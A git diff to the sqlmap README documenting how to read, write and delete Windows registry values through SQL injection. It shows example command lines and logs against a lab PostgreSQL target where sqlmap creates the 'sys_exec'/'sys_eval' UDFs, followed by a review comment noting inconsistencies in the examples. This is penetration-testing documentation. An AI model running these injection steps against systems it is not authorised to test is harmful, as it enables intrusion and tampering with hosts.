diff --git a/doc/README.sgml b/doc/README.sgml index 3c8d15b23..0cf2681ea 100644 --- a/doc/README.sgml +++ b/doc/README.sgml @@ -5254,68 +5254,164 @@ meterpreter > exit Windows registry access +

+It is possible to access Windows registry when the back-end +database management system is either MySQL, PostgreSQL or +Microsoft SQL Server, and when the underlying database layer +supports stacked SQL queries. Also, session user has to have +the needed privileges to access it. + Read a Windows registry key value

Option: --reg-read

-TODO +Using this option you can read registry key values. +

+Example on a PostgreSQL 8.4 target: -Write a Windows registry key value data + +$ python sqlmap.py -u http://172.16.213.128/sqlmap/pgsql/get_int.php?id=1 --reg-read + +[...] +web server operating system: Windows +web application technology: PHP 5.3.1, Apache 2.2.14 +back-end DBMS: PostgreSQL + +[hh:mm:15] [INFO] testing stacked queries support on parameter 'id' +[hh:mm:15] [INFO] detecting back-end DBMS version from its banner +[hh:mm:15] [INFO] retrieved: 8.4.2, +[hh:mm:23] [INFO] the web application supports stacked queries on parameter 'id' +[hh:mm:23] [INFO] fingerprinting the back-end DBMS operating system +[hh:mm:23] [INFO] retrieved: 1 +[hh:mm:23] [INFO] the back-end DBMS operating system is Windows +[hh:mm:23] [INFO] testing if current user is DBA +[hh:mm:23] [INFO] retrieved: 1 +[hh:mm:23] [INFO] checking if UDF 'sys_eval' already exist +[hh:mm:23] [INFO] retrieved: 0 +[hh:mm:24] [INFO] checking if UDF 'sys_exec' already exist +[hh:mm:24] [INFO] retrieved: 0 +[hh:mm:25] [INFO] creating UDF 'sys_eval' from the binary UDF file +[hh:mm:25] [INFO] creating UDF 'sys_exec' from the binary UDF file +which registry key do you want to read? [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion] +which registry key value do you want to read? [ProductName] +[hh:mm:34] [INFO] reading Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductName' +[hh:mm:35] [INFO] retrieved: ProductName REG_SZ Microsoft Windows XP +Registry key value data: 'ProductName REG_SZ Microsoft Windows XP' +[...] + + +Write a Windows registry key value

Option: --reg-add

-TODO +Using this option you can write registry key values. +

+Example on a PostgreSQL 8.4 target: -Delete a Windows registry key value + +$ python sqlmap.py -u http://172.16.213.128/sqlmap/pgsql/get_int.php?id=1 --reg-add + +[...] +web server operating system: Windows +web application technology: PHP 5.3.1, Apache 2.2.14 +back-end DBMS: PostgreSQL + +[hh:mm:20] [INFO] testing stacked queries support on parameter 'id' +[hh:mm:20] [INFO] detecting back-end DBMS version from its banner +[hh:mm:20] [INFO] retrieved: 8.4.2, +[hh:mm:29] [INFO] the web application supports stacked queries on parameter 'id' +[hh:mm:29] [INFO] fingerprinting the back-end DBMS operating system +[hh:mm:29] [INFO] retrieved: 1 +[hh:mm:30] [INFO] the back-end DBMS operating system is Windows +[hh:mm:30] [INFO] testing if current user is DBA +[hh:mm:30] [INFO] retrieved: 1 +[hh:mm:30] [INFO] checking if UDF 'sys_exec' already exist +[hh:mm:30] [INFO] retrieved: 0 +[hh:mm:06] [INFO] creating UDF 'sys_exec' from the binary UDF file +which registry key do you want to write? HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap +which registry key value do you want to write? Test +which registry key value data do you want to write? 1 +which registry key value data-type is it? [REG_SZ] REG_DWORD +[hh:mm:41] [INFO] adding Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap\Test' with data '1'. This will +work only if the user running the database process has privileges to modify the Windows registry. + +[*] shutting down at: hh:mm:42 + + +Delete a Windows registry key

Option: --reg-del

-TODO - - -Windows registry key +Using this option you can delete registry keys.

-Option: --reg-key +Example on a PostgreSQL 8.4 target: + + +$ python sqlmap.py -u http://172.16.213.128/sqlmap/pgsql/get_int.php?id=1 --reg-del + +[...] +web server operating system: Windows +web application technology: PHP 5.3.1, Apache 2.2.14 +back-end DBMS: PostgreSQL + +[hh:mm:20] [INFO] testing stacked queries support on parameter 'id' +[hh:mm:20] [INFO] detecting back-end DBMS version from its banner +[hh:mm:20] [INFO] retrieved: 8.4.2, +[hh:mm:29] [INFO] the web application supports stacked queries on parameter 'id' +[hh:mm:29] [INFO] fingerprinting the back-end DBMS operating system +[hh:mm:29] [INFO] retrieved: 1 +[hh:mm:30] [INFO] the back-end DBMS operating system is Windows +[hh:mm:30] [INFO] testing if current user is DBA +[hh:mm:30] [INFO] retrieved: 1 +[hh:mm:30] [INFO] checking if UDF 'sys_exec' already exist +[hh:mm:30] [INFO] retrieved: 0 +[hh:mm:06] [INFO] creating UDF 'sys_exec' from the binary UDF file +which registry key do you want to delete? HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap +which registry key value do you want to delete? Test +are you sure that you want to delete the Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap\Test? [y/N] y +[hh:mm:26] [INFO] deleting Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap\Test'. This will work only +if the user running the database process has privileges to modify the Windows registry. + +[*] shutting down at: hh:mm:27 + + +Auxiliary registry switches

-TODO - - -Windows registry key value +Option: --reg-key, --reg-value, +--reg-data and --reg-type

-Option: --reg-value +These switches can be used to provide data needed for proper running of +options --reg-read, --reg-add and +--reg-del. So, instead of providing registry key +information when asked, you can use them at command prompt as program +arguments.

-TODO - - -Windows registry key value data +With --reg-key option you specify used windows +registry key path, with --reg-value value item +name inside provided key, with --reg-data value +data, while with --reg-type option you specify +type of the value item.

-Option: --reg-data - -

-TODO - - -Windows registry key value type - -

-Option: --reg-type - -

-TODO +So, another way of running example from option +--reg-add could be: + +$ python sqlmap.py -u http://172.16.213.128/sqlmap/pgsql/get_int.php?id=1 --reg-add\ + --reg-key=HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap --reg-value=Test --reg-type=REG_SZ --reg-data=1 + Miscellaneous
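Review bot: the closing command-line example for --reg-add contradicts the interactive example it claims to reproduce: in the interactive run the user answers the data-type prompt with `REG_DWORD` ("which registry key value data-type is it? [REG_SZ] REG_DWORD"), but the non-interactive form passes `--reg-type=REG_SZ`, so it would write a string "1" rather than a DWORD. Change it to `--reg-type=REG_DWORD` (or change the interactive answer) so both runs create the same value. Two smaller points in the same hunk: the new heading and blurb for --reg-del say "Delete a Windows registry key" / "delete registry keys", yet the example prompts for both a key and a value ("which registry key value do you want to delete? Test") and deletes the path `HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap\Test`, i.e. a value item, so the heading should read "Delete a Windows registry key value" like the previous heading it replaces, or the text should state that the whole key is removed when no value is given. And the quoted confirmation line is missing its closing quote ("delete the Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap\Test? [y/N]"); if that is verbatim tool output it is a bug in the prompt string, otherwise fix the transcript.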